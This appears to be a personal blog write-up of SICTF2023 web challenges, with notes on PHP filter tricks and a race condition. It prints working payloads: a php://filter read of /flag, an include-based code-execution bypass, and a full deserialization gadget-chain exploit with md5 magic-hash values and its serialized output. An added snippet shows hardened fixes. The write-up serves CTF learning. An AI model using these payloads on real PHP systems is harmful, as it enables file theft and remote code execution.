Z1d10tのBlog

A note for myself, have fun!

  1. Include
  2. Baby_PHP
  3. RCE
  4. pain
  5. 我全都要 (I want it all)
  6. DoyouknowCC
  7. 你能跟得上我的speed吗 (Can you keep up with my speed?)

SICTF2023

The difficulty gradient of the challenges was not set sensibly; the split between the easy and the hard ones was far too extreme.

Include

Tests the php://filter pseudo-protocol: php://filter/read=convert.base64-encode/resource=

Baby_PHP

This challenge was really frustrating: the unintended solution of the original challenge does not work on this one, and command execution gives no output..

Key points:

  • Nesting, i.e. parameterless RCE
  • PHP illegal variable naming
  • %0a newline bypass

RCE

Source:

<?php
error_reporting(0);
highlight_file(__FILE__);
$code = $_POST['code'];
$code = str_replace("(","hacker",$code); // "(" is replaced, so no function calls
$code = str_replace(".","hacker",$code); // "." is replaced, so no string concatenation
eval($code);
?>

Parentheses and dots are filtered.

What you need to know here is that include can include a file without parentheses, because it is a language construct rather than a function.

payload:

post:code=include$_GET['x'];
get:x=php://filter/read=convert.base64-encode/resource=/flag

pain

Java, can't do it.

我全都要 (I want it all)

Source:

<?php
highlight_file(__FILE__);

class B{
public $pop;
public $i;
public $nogame;

// Entry point of the chain: preg_match() needs a string, so an object in $pop gets __toString() called
public function __destruct()
{
if(preg_match("/233333333/",$this->pop)){
echo "这是一道签到题,不能让新生一直做不出来遭受打击";
}
}

// Note the assignment (=) rather than a comparison, so the branch is always taken
public function game(){
echo "扣1送地狱火";
if ($this->i = "1"){
echo '<img src=\'R.jpg\'>';
$this->nogame->love();
}
}

// Sink: reached via P::__call cloning a new B
public function __clone(){
echo "必须执行";
eval($_POST["cmd"]);
}
}


class A{
public $Aec;
public $girl;
public $boy;

// Loose == on md5() output: "0e..." digests compare as numeric 0 == 0
public function __toString()
{
echo "I also want to fall in love";
if($this->girl != $this->boy && md5($this->girl) == md5($this->boy)){
$this->Aec->game();
}
}


}


class P{
public $MyLover;
// Any undefined method other than game() (e.g. love()) triggers the clone
public function __call($name, $arguments)
{
echo "有对象我会在这打CTF???看我克隆一个对象!";
if ($name != "game") {
echo "打游戏去,别想着对象了";
$this->MyLover = clone new B;
}
}


}


if ($_GET["A_B_C"]){
$poc=$_GET["A_B_C"];
unserialize($poc);
}

There is really only one point: the call to __toString() relies on preg_match("/233333333/", $this->pop).

As the signature of preg_match() shows, its subject parameter is of type string, so passing an object there invokes its __toString().

exp as follows:

<?php
// Minimal class stubs: only the properties are needed to build the serialized object graph
class B{
public $pop;
public $i;
public $nogame;
}
class A{
public $Aec;
public $girl;
public $boy;

}
class P{
public $MyLover;
}
$a=new B();                      // B::__destruct -> preg_match() on $pop
$a->pop=new A();                 // A::__toString -> md5 loose-comparison gate
$a->pop->girl= 'QNKCDZO';        // both md5() digests start with "0e", so == treats them as 0 == 0
$a->pop->boy='240610708';
$a->pop->Aec=new B();            // A::__toString -> B::game()
$a->pop->Aec->i='1';
$a->pop->Aec->nogame=new P();    // B::game -> $nogame->love() -> P::__call -> clone new B -> B::__clone -> eval
echo urlencode(serialize($a));
?>
#O%3A1%3A%22B%22%3A3%3A%7Bs%3A3%3A%22pop%22%3BO%3A1%3A%22A%22%3A3%3A%7Bs%3A3%3A%22Aec%22%3BO%3A1%3A%22B%22%3A3%3A%7Bs%3A3%3A%22pop%22%3BN%3Bs%3A1%3A%22i%22%3Bs%3A1%3A%221%22%3Bs%3A6%3A%22nogame%22%3BO%3A1%3A%22P%22%3A1%3A%7Bs%3A7%3A%22MyLover%22%3BN%3B%7D%7Ds%3A4%3A%22girl%22%3Bs%3A7%3A%22QNKCDZO%22%3Bs%3A3%3A%22boy%22%3Bs%3A9%3A%22240610708%22%3B%7Ds%3A1%3A%22i%22%3BN%3Bs%3A6%3A%22nogame%22%3BN%3B%7D
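An added example (my own, not the writeup's or the challenge's code) showing the two conditions this chain depends on, the md5 loose-comparison gate and unrestricted unserialize(), each next to its hardened form; the class B and the serialized string below are constructed stand-ins, not the challenge's.

```php
<?php
// Added example, not part of the writeup or the challenge: the two weak spots
// the POP chain above relies on, each beside a hardened form.

// 1. The gate in A::__toString is md5($girl) == md5($boy). Both digests begin
// with "0e" followed only by digits, so PHP reads them as numeric strings and
// `==` compares them as 0 == 0, even though the strings differ.
function looseMd5Gate(string $girl, string $boy): bool
{
    return $girl != $boy && md5($girl) == md5($boy);
}

// hash_equals() compares the digests byte for byte in constant time, so the
// "0e" magic values stop colliding.
function strictMd5Gate(string $girl, string $boy): bool
{
    return $girl !== $boy && hash_equals(md5($girl), md5($boy));
}

// 2. unserialize() on attacker-controlled input. With default options any
// class in scope is instantiated, so its __destruct/__toString/__call/__clone
// run on attacker-shaped objects. Restricting allowed_classes makes
// unserialize() return __PHP_Incomplete_Class objects instead, which carry
// no magic methods, so the chain never starts.
class B
{
    public $pop;
    public function __destruct()
    {
        echo "B::__destruct ran\n";
    }
}

// Constructed sample input, shaped like the challenge's A_B_C parameter.
$poc = 'O:1:"B":1:{s:3:"pop";N;}';
function unsafeLoad(string $poc): string
{
    // Default options: the real class B is instantiated, and its __destruct runs on release.
    return get_class(unserialize($poc));
}

function safeLoad(string $poc): string
{
    // allowed_classes => false: an incomplete-class placeholder with no magic methods.
    return get_class(unserialize($poc, ['allowed_classes' => false]));
}

var_dump(looseMd5Gate('QNKCDZO', '240610708'));  // the challenge values pass the loose gate
var_dump(strictMd5Gate('QNKCDZO', '240610708')); // and fail the strict one
var_dump(unsafeLoad($poc), safeLoad($poc));
```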

DoyouknowCC

Java, can't do it at all.

你能跟得上我的speed吗 (Can you keep up with my speed?)

Key points:

  • Race condition

Upload and read at the same time; it comes down to luck, and it can take a long time before it succeeds...
